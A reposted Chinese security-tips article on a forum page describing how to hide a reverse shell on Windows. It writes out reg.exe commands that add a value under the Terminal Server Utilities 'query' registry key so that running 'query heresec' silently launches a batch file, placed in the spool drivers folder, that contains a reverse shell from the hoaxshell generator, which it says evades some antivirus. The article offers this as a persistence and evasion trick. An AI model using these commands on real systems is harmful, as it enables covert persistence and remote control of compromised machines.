0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看威廉希尔官方网站 视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

用一条命令来隐藏反向Shell

jf_Fo0qk3ln 来源:关注安全威廉希尔官方网站 2023-07-05 09:32 次阅读

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

c58e25e2-1acb-11ee-962d-dac502259ad0.png

c5acff1c-1acb-11ee-962d-dac502259ad0.png

添加一条,打开计算器。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

c5cc27fc-1acb-11ee-962d-dac502259ad0.png

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

https://github.com/t3l3machus/hoaxshell

c5eedc98-1acb-11ee-962d-dac502259ad0.png

将命令写入一个bat脚本中,然后添加注册表后执行。

c6327a48-1acb-11ee-962d-dac502259ad0.png

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

只需执行命令query heresec即可运行反弹shell脚本。

c659cb66-1acb-11ee-962d-dac502259ad0.png

还能怎么用,再联想一下。

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9212

    浏览量

    85568
  • Shell
    +关注

    关注

    1

    文章

    366

    浏览量

    23404

原文标题:小技巧 | 用一条命令来隐藏反向Shell

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    Linux实现简易的Shell命令行解释器

    制作个简易的 [Shell 命令]行解释器。
    的头像 发表于 03-30 10:00 1803次阅读

    基于Go语言的反弹Shell命令生成工具简介

    RevShell 是个基于Go语言的反弹Shell命令生成工具,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Sh
    发表于 08-25 09:45 774次阅读
    基于Go语言的反弹<b class='flag-5'>Shell</b><b class='flag-5'>命令</b>生成工具简介

    Linux Shell系列教程之Shell简介和类型

    (Interactive):解释执行用户的命令,用户输入一条命令Shell就解释执行一条。批处理(Batch):用户事先写
    发表于 08-28 13:56

    linux shell命令/unix shell命令教程

    linux shell命令/unix shell命令教程:为了防止未授权用户访问你的文件,可以在文件和目录上设置权限位。还可以设定文件在创建时所具有的缺省权限:这些只是整个系统安全问题
    发表于 12-06 13:08 61次下载
    linux <b class='flag-5'>shell</b><b class='flag-5'>命令</b>/unix <b class='flag-5'>shell</b><b class='flag-5'>命令</b>教程

    Shell内建命令:exit命令

    1.简介 exit 命令Shell 内建命令,用于退出当前 Shell 进程。 2.命令格式 exit  N (1)状态码 N 的范围是
    的头像 发表于 02-02 10:45 4007次阅读

    Shell命令编程实践指南

    ‍‍我们在第次作为运维人员去学习和写shell脚本的时候,我们经常会做什么,我们把我们在‍‍ Linux上面去执行的那些命令,我们股脑的全部把它丢到
    的头像 发表于 08-19 13:10 1220次阅读
    <b class='flag-5'>Shell</b><b class='flag-5'>命令</b>编程实践指南

    Shell命令行解释器简介

    Shell命令行解释器,Shell 为用户提供了与设备进行命令行交互的方式,用户通过串口、以太网、无线等方式将
    的头像 发表于 08-19 17:20 3237次阅读

    shell脚本本身自带的命令详解

    除了以文件形式保存在/usr/bin下面的命令shell脚本中还可以使用shell本身自带的命令,即内置命令
    的头像 发表于 05-23 09:32 1047次阅读
    <b class='flag-5'>shell</b>脚本本身自带的<b class='flag-5'>命令</b>详解

    Kiuwan:如何防止反向Shell攻击

    员工收到封电子邮件,其中包含附件或链接。然后他们单击附件或链接并立即将些恶意软件下载到他们的计算机上。这就是攻击者获得反向 shell 连接的方式。然后攻击者可以在机器上执行
    的头像 发表于 07-09 10:57 941次阅读

    shell脚本基本命令

    Shell脚本是种可执行文件,它包含了某种特定语言编写的命令,这些命令可以被解释器(如b
    的头像 发表于 11-08 10:08 2178次阅读

    shell命令和linux命令样吗

    Shell命令和Linux命令并不完全样。 首先,Shell
    的头像 发表于 11-08 10:51 2898次阅读

    linux命令shell编程有什么联系

    Linux命令Shell编程之间存在密切的联系。 首先,Shell是Linux命令行下的解释器,它提供了个用户界面,使用户能够与Linu
    的头像 发表于 11-08 10:53 940次阅读

    linux命令行与shell编程实战

    Linux命令行与Shell编程实战主要涉及以下内容: Linux命令行基础:学习Linux命令行的基本操作,如文件管理、进程管理、网络配置等。熟悉使用
    的头像 发表于 11-08 10:57 788次阅读

    python shell怎么

    Python Shell的使用方法、功能和些常见的操作技巧。 Python Shell的启动: Python Shell可以通过在命令行中
    的头像 发表于 11-29 14:36 1184次阅读

    shell具有的功能和特点

    Shell命令行解释器,用于与操作系统进行交互。它提供了种方便的方式执行命令、管理文
    的头像 发表于 08-30 14:48 559次阅读